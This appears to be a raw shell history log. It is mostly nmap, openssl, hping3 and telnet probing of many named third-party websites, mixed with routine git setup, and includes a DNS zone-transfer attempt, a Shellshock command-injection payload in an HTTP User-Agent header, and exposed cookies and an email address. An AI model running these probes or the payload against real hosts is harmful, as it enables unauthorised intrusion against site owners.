/Volumes/Install\ OS\ X\ El\ Capitan/harvest_apples.py 
'


telnet venda.com 80
nslookup www.archipac.org
ifconfig
nmap -Pn 98.185.44.242 -p 8443,8080
nmap -Pn 98.185.44.242 -p 8443,8080
cd ~
nmap -Pn 98.185.44.242 -p 8443,8080
ssh daveh@whitebox.sm
ssh daveh@whitebox.sm
nmap
nmap
nmap -Pn 81.149.146.82 -p 61313
nmap -Pn 84.92.45.127 -p 59535
~/.bash_it/install.sh
pwd
ls
mkdir bashit
cd bashit/
git clone --depth=1 https://github.com/Bash-it/bash-it.git ~/.bash_it
ls
pwd
~/.bash_it/install.sh
sudo hping3 -S -Q 031409e.netsolstores.com -p 80
ssh daveh@whitebox.sm
pwd
ls
mkdir bashit
cd bashit/
git clone --depth=1 https://github.com/Bash-it/bash-it.git ~/.bash_it
ls
pwd
~/.bash_it/install.sh
sudo hping3 -S -Q 031409e.netsolstores.com -p 80
nmap -Pn secureinstantpayments.com -p 443
opentls
openssl s_client -connect secureinstantpayments.com:443 -tls
openssl s_client -connect secureinstantpayments.com:443 -tls1
openssl s_client -connect secureinstantpayments.com:443 -ssl3
openssl s_client -connect secureinstantpayments.com:443 -tls1_2
openssl s_client -connect secureinstantpayments.com:443 -tls1_
man openssl
openssl s_client -connect secureinstantpayments.com:443
openssl s_client -connect 02edd0f.netsolstores.com:443
nmap -Pn 67.151.130.250 -p 443 -A
nslookup 67.151.130.250
sudo hping3 -S -Q 031b620.netsolstores.com -p 80
ssh daveh@whitebox.sm
nslookup lionsden.molloy.edu
openssl s_client -connect 02edd0f.netsolstores.com:443
nmap -Pn 67.151.130.250 -p 443 -A
nslookup 67.151.130.250
sudo hping3 -S -Q 031b620.netsolstores.com -p 80
nslookup email.molloy.edu
nslookup bbs.molloy.edu
nslookup lionsden.molloy.edu
nslookup 64.34.199.194
nmap -Pn www.sunburstbottle.com -p 80 -A
nmap -Pn www.sunburstbottle.com -p 80,443 -A
nslookup api2.lazparking.com
telnet api2.lazparking.com 80
nmap -Pn -p vpn.bicsi.org --script ssl-enum-ciphers
nmap -Pn vpn.bicsi.org -p 443 --script ssl-enum-ciphers
nmap -Pn -p443 vpn.bicsi.org --script ssl-enum-ciphers
nmap -Pn -p 443 vpn.bicsi.org --script ssl-enum-ciphers
nmap -Pn -p 85 72.38.132.74
nmap -Pn -p 80,443 12.133.44.45
nslookup 12.133.44.45
nmap -Pn -p 21 www.siriusrocketry.biz --script ssl-enum-ciphers
nmap -Pn -p 21 www.classic-groundcovers.com --script ssl-enum-ciphers
dig @kohler-engine-parts.opeengines.com MX
dig kohler-engine-parts.opeengines.com MX
dig www.siriusrocketry.biz MX
ssh daveh@whitebox.sm
cd bashit/
git clone --depth=1 https://github.com/Bash-it/bash-it.git ~/.bash_it
~/.bash_it/install.sh
sudo hping3 -S -Q 031409e.netsolstores.com -p 80
nmap -Pn secureinstantpayments.com -p 443
opentls
openssl s_client -connect secureinstantpayments.com:443 -tls
openssl s_client -connect secureinstantpayments.com:443 -tls1
openssl s_client -connect secureinstantpayments.com:443 -ssl3
openssl s_client -connect secureinstantpayments.com:443 -tls1_2
openssl s_client -connect secureinstantpayments.com:443 -tls1_
man openssl
openssl s_client -connect secureinstantpayments.com:443
openssl s_client -connect 02edd0f.netsolstores.com:443
nmap -Pn 67.151.130.250 -p 443 -A
nslookup 67.151.130.250
sudo hping3 -S -Q 031b620.netsolstores.com -p 80
nslookup lionsden.molloy.edu
openssl s_client -connect 02edd0f.netsolstores.com:443
nmap -Pn 67.151.130.250 -p 443 -A
nslookup 67.151.130.250
sudo hping3 -S -Q 031b620.netsolstores.com -p 80
nslookup email.molloy.edu
nslookup bbs.molloy.edu
nslookup lionsden.molloy.edu
nslookup 64.34.199.194
nmap -Pn www.sunburstbottle.com -p 80 -A
nmap -Pn www.sunburstbottle.com -p 80,443 -A
nslookup api2.lazparking.com
telnet api2.lazparking.com 80
nmap -Pn -p vpn.bicsi.org --script ssl-enum-ciphers
nmap -Pn vpn.bicsi.org -p 443 --script ssl-enum-ciphers
nmap -Pn -p443 vpn.bicsi.org --script ssl-enum-ciphers
nmap -Pn -p 443 vpn.bicsi.org --script ssl-enum-ciphers
nmap -Pn -p 85 72.38.132.74
nmap -Pn -p 80,443 12.133.44.45
nslookup 12.133.44.45
nmap -Pn -p 21 www.classic-groundcovers.com --script ssl-enum-ciphers
dig @kohler-engine-parts.opeengines.com MX
dig kohler-engine-parts.opeengines.com MX
dig www.siriusrocketry.biz MX
nmap -Pn -p 3389,3391,443,25,
nmap -Pn -p 3389,3391,443,25 81.137.238.214
81.137.238.214
openssl s_client -connect 81.137.238.214:443
nmap -Pn -p 443 m-vacationrentalpros-42528514.us-west-2.elb.amazonaws.com
nmap -Pn -p 80 m-vacationrentalpros-42528514.us-west-2.elb.amazonaws.com
nmap -Pn -p 443 securitymetrics.com
openssl s_client -connect sasrxmedical-1056407597.us-west-2.elb.amazonaws.com:443
nmap -Pn -p 443,80 electricfireplacesdirect-149750838.us-west-2.elb.amazonaws.com
las
ls -al ~/.ssh
cd ~/.ssh/
cd known_hosts 
vim known_hosts 
ssh-keygen -t rsa -b 4096 -C "daveholmes05@gmail.com"
eval "$(ssh-agent -s)"
ssh-add ~/.ssh/id_rsa
pbcopy < ~/.ssh/id_rsa.pub
cd ~/
pwd
git clone git@github.com:Daveholmes05/JavaScript-Review.git
cd JavaScript-Review/
git config --global --edit
git commit -m "finished ArrayRevew.js"
git commit
git pushg
nmap -Pn -p 80,443 02b04f6.netsolstores.com -A
nmap -Pn -p 21 www.siriusrocketry.biz --script ssl-enum-ciphers
openssl s_client -connect www.feelthepaint.com:21 -starttls ftp
openssl s_client -connect www.daveholmes.info:21 -starttls ftp
openssl s_client -connect www.siriusrocketry.biz:21
openssl s_client -connect www.siriusrocketry.biz:21 ftp
openssl s_client -connect www.siriusrocketry.biz:21 -starttls
openssl s_client -connect www.siriusrocketry.biz:21 -starttls ftp
cd ~
cd devmtn/
git clone git@github.com:Daveholmes05/jquery.git
cd jquery/
ks
touch index.html
rm index.html 
touch index.html & touch app.js
open index.html 
git status
git add .
git commit -m "starting"
git push
nmap -Pn -p 80 033b3a5.netsolstores.com
nslookup 033b3a5.netsolstores.com
cd ..
git clone git@github.com:Daveholmes05/jQuery2.git
cd jQuery2/
ls
nmap -Pn -p 500 71.0.80.132 --script ssl-enum-ciphers
nmap -Pn -p 500 71.0.80.132 --script ssl-ccs-injection
ssh daveh@whitebox.sm
nslookup testrouter.holtzmancorp.com
nmap -Pn -p 454,455,443 104.43.142.33
nmap -Pn -p 42424,9212,7777,8006,9046,9036,6666 ittest.geonetric.com
openssl s_client -connect ittest.geonetric.com:9212 -servername ittest.geonetric.com
openssl s_client -connect ittest.geonetric.com:42424 -servername ittest.geonetric.com
nmap -Pn -p 9212 ittest.geonetric.com
openssl s_client -connect ittest.geonetric.com:443 -servername ittest.geonetric.com
openssl s_client -connect ittest.geonetric.com:443
clear
telnet stg3.irisregistration.com 80
telnet stg3.irisconference.com 80
telnet stg3.qa-irisregistration.com 80
nslookup cottontraderdryrun.live.venda.com
nslookup cp0288.edgewebhosting.net
nslookup bvew1.brandvia.com
nslookup bvew3.brandvia.com
nslookup cp0288.edgewebhosting.net
nslookup bvew1.brandvia.com
nslookup bvew3.brandvia.com
nmap -Pn -p 444 www.hopkinsmedicalproducts.com
nslookup v1.focusonthefamily.com
sudo purge
cd devmtn/
cd JavaScript-Review/
subl
cd ~
ls
pwd
cd ~
ls
pwd
telnet 02e3ac6.netsolstores.com
GET /sitemap.aspx HTTP/1.1
Host: 02e3ac6.netsolstores.com
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Connection: Keep-Alive
Cookie: previous-category-id=2; continue-shopping-redirect=/johndeeretoys.aspx; chkvalues=oINBJ7DC/qpSF0qAVdl/2iBY8iqblHaQVcbanoly7DvS6RKw/0eJ5lL0WJImQ3yi; anonymousID=e2Vk_7xJ0gEkAAAANjQ4NzllMWMtOTJiYy00NmJkLWJhNWEtODc5MzhiNmJkYzgzttRwQacfGp39ft5PiqyOja5h97Q1; WAWebSiteSID=25b9d4df6866487abc1c9c05df48e5c4; ARRAffinity=8cbb7ad2c39e3a93aef9d53354e3217b08af4f2e3b2b0b096f3e60d31be3030c; .ASPXAUTHSF=
User-Agent: () { ignored; }; /bin/sleep 15;
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
telnet feelthepaint.com
telnet daveholmes.info
telnet securitymetrics.com
telnet securitymetrics.com 80
telnet 02e3ac6.netsolstores.com 80
sudo hping3 -S -Q 02b9e61.netsolstores.com -p 80
ssh daveh@whitebox.sm
nslookup tcnp3.com
telnet 02e3ac6.netsolstores.com 80
sudo hping3 -S -Q 02b9e61.netsolstores.com -p 80
nslookup tcnp3.com
openssl s_client -connect www.chicagosport.com:443 -tls
openssl s_client -connect www.chicagosport.com:443 -tls1
nmap -Pn -p 443 www.chicagosport.com
openssl s_client -connect www.chicagosport.com:443
ssh daveh@whitebox.sm
dig @libreria.encontacto.org libreria.encontacto.org axfr
nmap -Pn -p 3389,3391,25,443 81.137.238.214
openssl s_client -connect usermanager.nmfta.org:443
ssh daveh@whitebox.sm
nmap -Pn -p 8553 fts.prinpay.com
whois rubberdummies.com
nmap -Pn -p 443 64.132.86.102
nmap -Pn -p 443 64.132.86.102 --script ssl-enum-ciphers
ssh daveh@whitebox.sm
sudo hping3 -S -Q 108.222.188.162 -p 80
ssh daveh@whitebox.sm
nslookup 02739.eymking.com
nslookup 74.1.214.86
telnet www.traditionaljewelers.com 80
telnet www.tradtionaljewelers.com 80
telnet www.traditionaljewelers.com 80
ssh daveh@whitebox.sm
telnet www.traditionaljewelers.com 80
ssh daveh@whitebox.sm
openssl s_client -connect 184.106.86.235:443
ssh root@daveholmes.info
